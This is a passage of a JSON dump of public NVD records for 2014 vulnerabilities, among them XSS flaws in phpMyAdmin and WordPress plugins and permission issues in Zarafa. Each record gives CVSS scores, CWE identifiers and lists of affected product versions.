"cpe:/a:mantisbt:mantisbt:1.2.4", "cpe:/a:mantisbt:mantisbt:1.2.8", "cpe:/a:mantisbt:mantisbt:1.2.9", "cpe:/a:mantisbt:mantisbt:1.2.2", "cpe:/a:mantisbt:mantisbt:1.2.13", "cpe:/a:mantisbt:mantisbt:1.2.1", "cpe:/a:mantisbt:mantisbt:1.2.5", "cpe:/a:mantisbt:mantisbt:1.2.14"], "id": "CVE-2014-1609", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1609", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mantisbt:mantisbt:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:alpha1:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.10:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:44:55", "description": "Zarafa WebAccess 7.1.10 and WebApp 1.6 beta uses weak permissions (644) for config.php, which allows local users to obtain sensitive information by reading the PHP session files. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0103.", "cvss3": {}, "published": "2014-10-20T15:55:00", "type": "cve", "title": "CVE-2014-5447", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0103", "CVE-2014-5447"], "modified": "2015-11-17T16:28:00", "cpe": ["cpe:/a:zarafa:zarafa:7.1.10", "cpe:/a:zarafa:webapp:1.6"], "id": "CVE-2014-5447", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5447", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:zarafa:zarafa:7.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:zarafa:webapp:1.6:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:32:15", "description": "Cross-site scripting (XSS) vulnerability in the Google Calendar Events plugin before 2.0.4 for WordPress allows remote attackers to inject arbitrary web script or HTML via the gce_feed_ids parameter in a gce_ajax action to wp-admin/admin-ajax.php.", "cvss3": {}, "published": "2014-10-16T19:55:00", "type": "cve", "title": "CVE-2014-7138", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7138"], "modified": "2018-10-09T19:51:00", "cpe": ["cpe:/a:google_calendar_events_project:google_calendar_events:2.0.3.1"], "id": "CVE-2014-7138", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7138", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google_calendar_events_project:google_calendar_events:2.0.3.1:*:*:*:*:wordpress:*:*"]}, {"lastseen": "2022-03-23T13:45:08", "description": "Zarafa Collaboration Platform 4.1 uses world-readable permissions for /etc/zarafa/license, which allows local users to obtain sensitive information by reading license files.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-03-19T21:29:00", "type": "cve", "title": "CVE-2014-5450", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5450"], "modified": "2018-04-20T14:56:00", "cpe": ["cpe:/a:zarafa:zarafa_collaboration_platform:4.1"], "id": "CVE-2014-5450", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5450", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": 
["cpe:2.3:a:zarafa:zarafa_collaboration_platform:4.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:31:25", "description": "Cross-site scripting (XSS) vulnerability in Telerik UI for ASP.NET AJAX RadEditor control 2014.1.403.35, 2009.3.1208.20, and other versions allows remote attackers to inject arbitrary web script or HTML via CSS expressions in style attributes.", "cvss3": {}, "published": "2014-09-26T21:55:00", "type": "cve", "title": "CVE-2014-4958", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4958"], "modified": "2015-09-16T19:30:00", "cpe": ["cpe:/a:telerik:asp.net_ajax_radeditor_control:2009.3.1208.20", "cpe:/a:telerik:asp.net_ajax_radeditor_control:2014.1.403.35"], "id": "CVE-2014-4958", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4958", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:telerik:asp.net_ajax_radeditor_control:2014.1.403.35:*:*:*:*:*:*:*", "cpe:2.3:a:telerik:asp.net_ajax_radeditor_control:2009.3.1208.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:32:19", "description": "Multiple cross-site scripting (XSS) vulnerabilities in the Contact Form DB (aka CFDB and contact-form-7-to-database-extension) plugin before 2.8.16 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) form or (2) enc parameter in the CF7DBPluginShortCodeBuilder page to wp-admin/admin.php.", "cvss3": {}, "published": "2014-10-10T14:55:00", "type": "cve", "title": "CVE-2014-7139", "cwe": ["CWE-79"], 
"bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7139"], "modified": "2018-10-09T19:51:00", "cpe": ["cpe:/a:cfdbplugin:contact_form_db:2.8.15"], "id": "CVE-2014-7139", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7139", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:cfdbplugin:contact_form_db:2.8.15:*:*:*:*:wordpress:*:*"]}, {"lastseen": "2022-03-23T14:08:43", "description": "Multiple cross-site scripting (XSS) vulnerabilities in the Web-Dorado Photo Gallery plugin 1.1.30 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) callback, (2) dir, or (3) extensions parameter in an addImages action to wp-admin/admin-ajax.php.", "cvss3": {}, "published": "2014-10-10T14:55:00", "type": "cve", "title": "CVE-2014-6315", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6315"], "modified": "2018-10-09T19:51:00", "cpe": ["cpe:/a:photo_gallery_plugin_project:photo_gallery_plugin:1.1.30"], "id": "CVE-2014-6315", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6315", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:photo_gallery_plugin_project:photo_gallery_plugin:1.1.30:*:*:*:*:wordpress:*:*"]}, {"lastseen": "2022-03-23T14:08:25", "description": "Cross-site scripting (XSS) vulnerability in the micro history implementation in phpMyAdmin 4.0.x before 4.0.10.3, 4.1.x before 4.1.14.4, and 4.2.x before 4.2.8.1 allows remote attackers to inject arbitrary web script or HTML, and consequently conduct a cross-site request forgery (CSRF) attack to create a root account, via a crafted URL, related to js/ajax.js.", "cvss3": {}, "published": "2014-11-08T11:55:00", "type": "cve", "title": "CVE-2014-6300", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:4.1.11", "cpe:/a:phpmyadmin:phpmyadmin:4.0.10", "cpe:/a:phpmyadmin:phpmyadmin:4.1.8", "cpe:/a:phpmyadmin:phpmyadmin:4.2.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.5", "cpe:/a:phpmyadmin:phpmyadmin:4.0.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.12", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14", "cpe:/a:phpmyadmin:phpmyadmin:4.2.7.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.13", "cpe:/a:phpmyadmin:phpmyadmin:4.0.10.2", "cpe:/a:phpmyadmin:phpmyadmin:4.0.2", "cpe:/o:opensuse:opensuse:12.3", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4", "cpe:/a:phpmyadmin:phpmyadmin:4.0.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.4", "cpe:/a:phpmyadmin:phpmyadmin:4.0.8", 
"cpe:/a:phpmyadmin:phpmyadmin:4.0.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.3", "cpe:/a:phpmyadmin:phpmyadmin:4.1.6", "cpe:/a:phpmyadmin:phpmyadmin:4.2.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.7", "cpe:/a:phpmyadmin:phpmyadmin:4.0.3", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4.1", "cpe:/a:phpmyadmin:phpmyadmin:4.2.2", "cpe:/a:phpmyadmin:phpmyadmin:4.0.5", "cpe:/a:phpmyadmin:phpmyadmin:4.0.7", "cpe:/a:phpmyadmin:phpmyadmin:4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.0", "cpe:/a:phpmyadmin:phpmyadmin:4.0.6", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.10", "cpe:/a:phpmyadmin:phpmyadmin:4.2.3", "cpe:/a:phpmyadmin:phpmyadmin:4.2.7", "cpe:/a:phpmyadmin:phpmyadmin:4.2.8", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.3"], "id": "CVE-2014-6300", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6300", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14.1:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:12.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:45:49", "description": "Cross-site request forgery (CSRF) vulnerability in the Storefront Application in DS Data Systems KonaKart before 7.3.0.0 allows remote attackers to hijack the authentication of administrators for requests that change a user email address via an unspecified GET request.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": 
"MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-01-03T20:15:00", "type": "cve", "title": "CVE-2014-5516", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5516"], "modified": "2020-01-15T20:36:00", "cpe": [], "id": "CVE-2014-5516", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5516", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T13:23:11", "description": "Cross-site scripting (XSS) vulnerability in MyWebSQL 3.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the table parameter to index.php.", "cvss3": {}, "published": "2014-09-12T14:55:00", "type": "cve", "title": "CVE-2014-4735", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4735"], "modified": "2018-10-09T19:49:00", "cpe": ["cpe:/a:mywebsql:mywebsql:3.1", "cpe:/a:mywebsql:mywebsql:3.2", "cpe:/a:mywebsql:mywebsql:3.0", "cpe:/a:mywebsql:mywebsql:3.4", "cpe:/a:mywebsql:mywebsql:3.3"], "id": "CVE-2014-4735", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4735", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mywebsql:mywebsql:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mywebsql:mywebsql:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mywebsql:mywebsql:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mywebsql:mywebsql:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mywebsql:mywebsql:3.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:34:30", "description": "Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.0.x before 4.0.10.4, 4.1.x before 4.1.14.5, and 4.2.x before 4.2.9.1 allow remote authenticated users to inject arbitrary web script or HTML via a crafted ENUM value that is improperly handled during rendering of the (1) table search or (2) table structure page, related to libraries/TableSearch.class.php and libraries/Util.class.php.", "cvss3": {}, "published": "2014-10-03T01:55:00", "type": "cve", "title": "CVE-2014-7217", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2016-04-04T13:15:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:4.1.11", "cpe:/a:phpmyadmin:phpmyadmin:4.2.8.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.8", 
"cpe:/a:phpmyadmin:phpmyadmin:4.2.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.5", "cpe:/a:phpmyadmin:phpmyadmin:4.0.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.12", "cpe:/a:phpmyadmin:phpmyadmin:4.2.7.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14", "cpe:/a:phpmyadmin:phpmyadmin:4.1.13", "cpe:/a:phpmyadmin:phpmyadmin:4.0.2", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4", "cpe:/a:phpmyadmin:phpmyadmin:4.0.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.4", "cpe:/a:phpmyadmin:phpmyadmin:4.0.8", "cpe:/a:phpmyadmin:phpmyadmin:4.0.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.3", "cpe:/a:phpmyadmin:phpmyadmin:4.2.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.6", "cpe:/a:phpmyadmin:phpmyadmin:4.1.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.7", "cpe:/a:phpmyadmin:phpmyadmin:4.0.3", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4.1", "cpe:/a:phpmyadmin:phpmyadmin:4.2.2", "cpe:/a:phpmyadmin:phpmyadmin:4.0.5", "cpe:/a:phpmyadmin:phpmyadmin:4.0.7", "cpe:/a:phpmyadmin:phpmyadmin:4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.0", "cpe:/a:phpmyadmin:phpmyadmin:4.0.6", "cpe:/a:phpmyadmin:phpmyadmin:4.1.10", "cpe:/a:phpmyadmin:phpmyadmin:4.2.3", "cpe:/a:phpmyadmin:phpmyadmin:4.2.9", "cpe:/a:phpmyadmin:phpmyadmin:4.2.7", "cpe:/a:phpmyadmin:phpmyadmin:4.2.8", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.3"], "id": "CVE-2014-7217", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7217", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.13:*:*:*:*:*:*:*", 
"cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.10:*:*:*:*:*:*:*", 